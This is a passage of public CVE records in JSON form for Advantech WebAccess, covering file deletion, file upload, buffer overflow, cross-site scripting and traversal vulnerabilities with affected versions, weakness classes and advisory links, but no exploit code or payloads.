], "url": "https://www.tenable.com/security/research/tra-2019-15" }, { "name": "107847", "tags": [ "vdb-entry", "x_refsource_BID" ], "url": "http://www.securityfocus.com/bid/107847" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "vulnreport@tenable.com", "ID": "CVE-2019-3941", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "WebAccess", "version": { "version_data": [ { "version_value": "8.3.4" } ] } } ] }, "vendor_name": "Advantech" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Advantech WebAccess 8.3.4 allows unauthenticated, remote attackers to delete arbitrary files via IOCTL 10005 RPC." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Unrestrived File Deletion" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.tenable.com/security/research/tra-2019-15", "refsource": "MISC", "url": "https://www.tenable.com/security/research/tra-2019-15" }, { "name": "107847", "refsource": "BID", "url": "http://www.securityfocus.com/bid/107847" } ] } } } }, "cveMetadata": { "assignerOrgId": "5ac1ecc2-367a-4d16-a0b2-35d495ddd0be", "assignerShortName": "tenable", "cveId": "CVE-2019-3941", "datePublished": "2019-04-09T15:06:37", "dateReserved": "2019-01-03T00:00:00", "dateUpdated": "2024-08-04T19:26:27.534Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2018-7499
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
http://www.securityfocus.com/bid/104190 | vdb-entry, x_refsource_BID | |
https://ics-cert.us-cert.gov/advisories/ICSA-18-135-01 | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T06:31:03.631Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "104190", "tags": [ "vdb-entry", "x_refsource_BID", "x_transferred" ], "url": "http://www.securityfocus.com/bid/104190" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-135-01" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "WebAccess", "vendor": "Advantech", "versions": [ { "status": "affected", "version": "WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, WebAccess/NMS 2.0.3 and prior." } ] } ], "datePublic": "2018-05-15T00:00:00", "descriptions": [ { "lang": "en", "value": "In Advantech WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, and WebAccess/NMS 2.0.3 and prior, several stack-based buffer overflow vulnerabilities have been identified, which may allow an attacker to execute arbitrary code." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-121", "description": "STACK-BASED BUFFER OVERFLOW CWE-121", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2018-05-17T09:57:01", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "name": "104190", "tags": [ "vdb-entry", "x_refsource_BID" ], "url": "http://www.securityfocus.com/bid/104190" }, { "tags": [ "x_refsource_MISC" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-135-01" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "DATE_PUBLIC": "2018-05-15T00:00:00", "ID": "CVE-2018-7499", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "WebAccess", "version": { "version_data": [ { "version_value": "WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, WebAccess/NMS 2.0.3 and prior." } ] } } ] }, "vendor_name": "Advantech" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "In Advantech WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, and WebAccess/NMS 2.0.3 and prior, several stack-based buffer overflow vulnerabilities have been identified, which may allow an attacker to execute arbitrary code." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "STACK-BASED BUFFER OVERFLOW CWE-121" } ] } ] }, "references": { "reference_data": [ { "name": "104190", "refsource": "BID", "url": "http://www.securityfocus.com/bid/104190" }, { "name": "https://ics-cert.us-cert.gov/advisories/ICSA-18-135-01", "refsource": "MISC", "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-135-01" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2018-7499", "datePublished": "2018-05-15T22:00:00Z", "dateReserved": "2018-02-26T00:00:00", "dateUpdated": "2024-09-16T20:58:20.098Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2019-3940
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.tenable.com/security/research/tra-2019-15 | x_refsource_MISC | |
http://www.securityfocus.com/bid/107847 | vdb-entry, x_refsource_BID |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T19:26:27.481Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.tenable.com/security/research/tra-2019-15" }, { "name": "107847", "tags": [ "vdb-entry", "x_refsource_BID", "x_transferred" ], "url": "http://www.securityfocus.com/bid/107847" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "WebAccess", "vendor": "Advantech", "versions": [ { "status": "affected", "version": "8.3.4" } ] } ], "datePublic": "2019-04-04T00:00:00", "descriptions": [ { "lang": "en", "value": "Advantech WebAccess 8.3.4 is vulnerable to file upload attacks via unauthenticated RPC call. An unauthenticated, remote attacker can use this vulnerability to execute arbitrary code." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-434", "description": "CWE-434 Unrestricted File Upload", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2019-04-10T15:06:14", "orgId": "5ac1ecc2-367a-4d16-a0b2-35d495ddd0be", "shortName": "tenable" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://www.tenable.com/security/research/tra-2019-15" }, { "name": "107847", "tags": [ "vdb-entry", "x_refsource_BID" ], "url": "http://www.securityfocus.com/bid/107847" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "vulnreport@tenable.com", "ID": "CVE-2019-3940", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "WebAccess", "version": { "version_data": [ { "version_value": "8.3.4" } ] } } ] }, "vendor_name": "Advantech" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Advantech WebAccess 8.3.4 is vulnerable to file upload attacks via unauthenticated RPC call. An unauthenticated, remote attacker can use this vulnerability to execute arbitrary code." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "CWE-434 Unrestricted File Upload" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.tenable.com/security/research/tra-2019-15", "refsource": "MISC", "url": "https://www.tenable.com/security/research/tra-2019-15" }, { "name": "107847", "refsource": "BID", "url": "http://www.securityfocus.com/bid/107847" } ] } } } }, "cveMetadata": { "assignerOrgId": "5ac1ecc2-367a-4d16-a0b2-35d495ddd0be", "assignerShortName": "tenable", "cveId": "CVE-2019-3940", "datePublished": "2019-04-09T15:05:01", "dateReserved": "2019-01-03T00:00:00", "dateUpdated": "2024-08-04T19:26:27.481Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2016-0856
Vulnerability from cvelistv5
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T22:30:05.073Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-112" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-101" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-118" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-120" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-116" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-108" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-102" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-113" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-103" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-117" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-115" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-106" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-114" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-110" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-109" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-100" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-111" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "datePublic": "2016-01-14T00:00:00", "descriptions": [ { "lang": "en", "value": "Multiple stack-based buffer overflows in Advantech WebAccess before 8.1 allow remote attackers to execute arbitrary code via unspecified vectors." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2016-12-01T15:57:02", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-112" }, { "tags": [ "x_refsource_MISC" ], "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-101" }, { "tags": [ "x_refsource_MISC" ], "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-118" }, { "tags": [ "x_refsource_MISC" ], "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-120" }, { "tags": [ "x_refsource_MISC" ], "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-116" }, { "tags": [ "x_refsource_MISC" ], "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-108" }, { "tags": [ "x_refsource_MISC" ], "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-102" }, { "tags": [ "x_refsource_MISC" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01" }, { "tags": [ "x_refsource_MISC" ], "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-113" }, { "tags": [ "x_refsource_MISC" ], "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-103" }, { "tags": [ "x_refsource_MISC" ], "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-117" }, { "tags": [ "x_refsource_MISC" ], "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-115" }, { "tags": [ "x_refsource_MISC" ], "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-106" }, { "tags": [ "x_refsource_MISC" ], "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-114" }, { "tags": [ "x_refsource_MISC" ], "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-110" }, { "tags": [ "x_refsource_MISC" ], "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-109" }, { "tags": [ "x_refsource_MISC" ], "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-100" }, { "tags": [ "x_refsource_MISC" ], "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-111" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "ID": "CVE-2016-0856", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Multiple stack-based buffer overflows in Advantech WebAccess before 8.1 allow remote attackers to execute arbitrary code via unspecified vectors." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "http://www.zerodayinitiative.com/advisories/ZDI-16-112", "refsource": "MISC", "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-112" }, { "name": "http://www.zerodayinitiative.com/advisories/ZDI-16-101", "refsource": "MISC", "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-101" }, { "name": "http://www.zerodayinitiative.com/advisories/ZDI-16-118", "refsource": "MISC", "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-118" }, { "name": "http://www.zerodayinitiative.com/advisories/ZDI-16-120", "refsource": "MISC", "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-120" }, { "name": "http://www.zerodayinitiative.com/advisories/ZDI-16-116", "refsource": "MISC", "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-116" }, { "name": "http://www.zerodayinitiative.com/advisories/ZDI-16-108", "refsource": "MISC", "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-108" }, { "name": "http://www.zerodayinitiative.com/advisories/ZDI-16-102", "refsource": "MISC", "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-102" }, { "name": "https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01", "refsource": "MISC", "url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01" }, { "name": "http://www.zerodayinitiative.com/advisories/ZDI-16-113", "refsource": "MISC", "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-113" }, { "name": "http://www.zerodayinitiative.com/advisories/ZDI-16-103", "refsource": "MISC", "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-103" }, { "name": "http://www.zerodayinitiative.com/advisories/ZDI-16-117", "refsource": "MISC", "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-117" }, { "name": "http://www.zerodayinitiative.com/advisories/ZDI-16-115", "refsource": "MISC", "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-115" }, { "name": "http://www.zerodayinitiative.com/advisories/ZDI-16-106", "refsource": "MISC", "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-106" }, { "name": "http://www.zerodayinitiative.com/advisories/ZDI-16-114", "refsource": "MISC", "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-114" }, { "name": "http://www.zerodayinitiative.com/advisories/ZDI-16-110", "refsource": "MISC", "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-110" }, { "name": "http://www.zerodayinitiative.com/advisories/ZDI-16-109", "refsource": "MISC", "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-109" }, { "name": "http://www.zerodayinitiative.com/advisories/ZDI-16-100", "refsource": "MISC", "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-100" }, { "name": "http://www.zerodayinitiative.com/advisories/ZDI-16-111", "refsource": "MISC", "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-111" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2016-0856", "datePublished": "2016-01-15T02:00:00", "dateReserved": "2015-12-17T00:00:00", "dateUpdated": "2024-08-05T22:30:05.073Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2021-38408
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://us-cert.cisa.gov/ics/advisories/icsa-21-245-03 | x_refsource_MISC |
Vendor | Product | Version | |
---|---|---|---|
▼ | n/a | Advantech WebAccess |
Version: WebAccess: Versions 9.02 and prior |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T01:37:16.572Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-245-03" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Advantech WebAccess", "vendor": "n/a", "versions": [ { "status": "affected", "version": "WebAccess: Versions 9.02 and prior" } ] } ], "descriptions": [ { "lang": "en", "value": "A stack-based buffer overflow vulnerability in Advantech WebAccess Versions 9.02 and prior caused by a lack of proper validation of the length of user-supplied data may allow remote code execution." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-121", "description": "STACK-BASED BUFFER OVERFLOW CWE-121", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2021-09-09T11:24:58", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-245-03" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "ID": "CVE-2021-38408", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Advantech WebAccess", "version": { "version_data": [ { "version_value": "WebAccess: Versions 9.02 and prior" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "A stack-based buffer overflow vulnerability in Advantech WebAccess Versions 9.02 and prior caused by a lack of proper validation of the length of user-supplied data may allow remote code execution." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "STACK-BASED BUFFER OVERFLOW CWE-121" } ] } ] }, "references": { "reference_data": [ { "name": "https://us-cert.cisa.gov/ics/advisories/icsa-21-245-03", "refsource": "MISC", "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-245-03" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2021-38408", "datePublished": "2021-09-09T11:24:58", "dateReserved": "2021-08-10T00:00:00", "dateUpdated": "2024-08-04T01:37:16.572Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2015-3948
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01 | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-06T06:04:00.988Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "datePublic": "2016-01-14T00:00:00", "descriptions": [ { "lang": "en", "value": "Cross-site scripting (XSS) vulnerability in Advantech WebAccess before 8.1 allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2016-01-15T02:57:01", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "ID": "CVE-2015-3948", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Cross-site scripting (XSS) vulnerability in Advantech WebAccess before 8.1 allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01", "refsource": "MISC", "url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2015-3948", "datePublished": "2016-01-15T02:00:00", "dateReserved": "2015-05-12T00:00:00", "dateUpdated": "2024-08-06T06:04:00.988Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2018-7503
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
http://www.securityfocus.com/bid/104190 | vdb-entry, x_refsource_BID | |
https://ics-cert.us-cert.gov/advisories/ICSA-18-135-01 | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T06:31:03.711Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "104190", "tags": [ "vdb-entry", "x_refsource_BID", "x_transferred" ], "url": "http://www.securityfocus.com/bid/104190" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-135-01" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "WebAccess", "vendor": "Advantech", "versions": [ { "status": "affected", "version": "WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, WebAccess/NMS 2.0.3 and prior." } ] } ], "datePublic": "2018-05-15T00:00:00", "descriptions": [ { "lang": "en", "value": "In Advantech WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, and WebAccess/NMS 2.0.3 and prior, a path transversal vulnerability has been identified, which may allow an attacker to disclose sensitive information on the target." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-22", "description": "PATH TRAVERSAL CWE-22", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2018-05-17T09:57:01", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "name": "104190", "tags": [ "vdb-entry", "x_refsource_BID" ], "url": "http://www.securityfocus.com/bid/104190" }, { "tags": [ "x_refsource_MISC" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-135-01" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "DATE_PUBLIC": "2018-05-15T00:00:00", "ID": "CVE-2018-7503", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "WebAccess", "version": { "version_data": [ { "version_value": "WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, WebAccess/NMS 2.0.3 and prior." } ] } } ] }, "vendor_name": "Advantech" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "In Advantech WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, and WebAccess/NMS 2.0.3 and prior, a path transversal vulnerability has been identified, which may allow an attacker to disclose sensitive information on the target." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "PATH TRAVERSAL CWE-22" } ] } ] }, "references": { "reference_data": [ { "name": "104190", "refsource": "BID", "url": "http://www.securityfocus.com/bid/104190" }, { "name": "https://ics-cert.us-cert.gov/advisories/ICSA-18-135-01", "refsource": "MISC", "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-135-01" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2018-7503", "datePublished": "2018-05-15T22:00:00Z", "dateReserved": "2018-02-26T00:00:00", "dateUpdated": "2024-09-16T17:24:19.997Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2018-15706
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.tenable.com/security/research/tra-2018-35 | x_refsource_MISC |
Vendor | Product | Version | |
---|---|---|---|
▼ | Advantech | Advantech WebAccess |
Version: 8.3.1 and 8.3.2 |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T10:01:54.615Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.tenable.com/security/research/tra-2018-35" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Advantech WebAccess", "vendor": "Advantech", "versions": [ { "status": "affected", "version": "8.3.1 and 8.3.2" } ] } ], "datePublic": "2018-10-31T00:00:00", "descriptions": [ { "lang": "en", "value": "WADashboard API in Advantech WebAccess 8.3.1 and 8.3.2 allows remote authenticated attackers to read any file on the filesystem due to a directory traversal vulnerability in the readFile API." } ], "problemTypes": [ { "descriptions": [ { "description": "Directory Traversal", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2018-10-31T21:57:01", "orgId": "5ac1ecc2-367a-4d16-a0b2-35d495ddd0be", "shortName": "tenable" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://www.tenable.com/security/research/tra-2018-35" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "vulnreport@tenable.com", "DATE_PUBLIC": "2018-10-31T00:00:00", "ID": "CVE-2018-15706", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Advantech WebAccess", "version": { "version_data": [ { "version_value": "8.3.1 and 8.3.2" } ] } } ] }, "vendor_name": "Advantech" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "WADashboard API in Advantech WebAccess 8.3.1 and 8.3.2 allows remote authenticated attackers to read any file on the filesystem due to a directory traversal vulnerability in the readFile API." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Directory Traversal" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.tenable.com/security/research/tra-2018-35", "refsource": "MISC", "url": "https://www.tenable.com/security/research/tra-2018-35" } ] } } } }, "cveMetadata": { "assignerOrgId": "5ac1ecc2-367a-4d16-a0b2-35d495ddd0be", "assignerShortName": "tenable", "cveId": "CVE-2018-15706", "datePublished": "2018-10-31T22:00:00Z", "dateReserved": "2018-08-22T00:00:00", "dateUpdated": "2024-09-17T02:15:57.656Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2018-15703
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.tenable.com/security/research/tra-2018-33 | x_refsource_MISC |
Vendor | Product | Version | |
---|---|---|---|
▼ | Advantech | Advantech WebAccess |
Version: 8.3.2 and below |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T10:01:54.524Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.tenable.com/security/research/tra-2018-33" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Advantech WebAccess", "vendor": "Advantech", "versions": [ { "status": "affected", "version": "8.3.2 and below" } ] } ], "datePublic": "2018-10-18T00:00:00", "descriptions": [ { "lang": "en", "value": "Advantech WebAccess 8.3.2 and below is vulnerable to multiple reflected cross site scripting vulnerabilities. A remote unauthenticated attacker could potentially exploit this vulnerability by tricking a victim to supply malicious HTML or JavaScript code to WebAccess, which is then reflected back to the victim and executed by the web browser." } ], "problemTypes": [ { "descriptions": [ { "description": "Reflected Cross Site Scripting", "lang": "en", "type": "text" } ] } ], 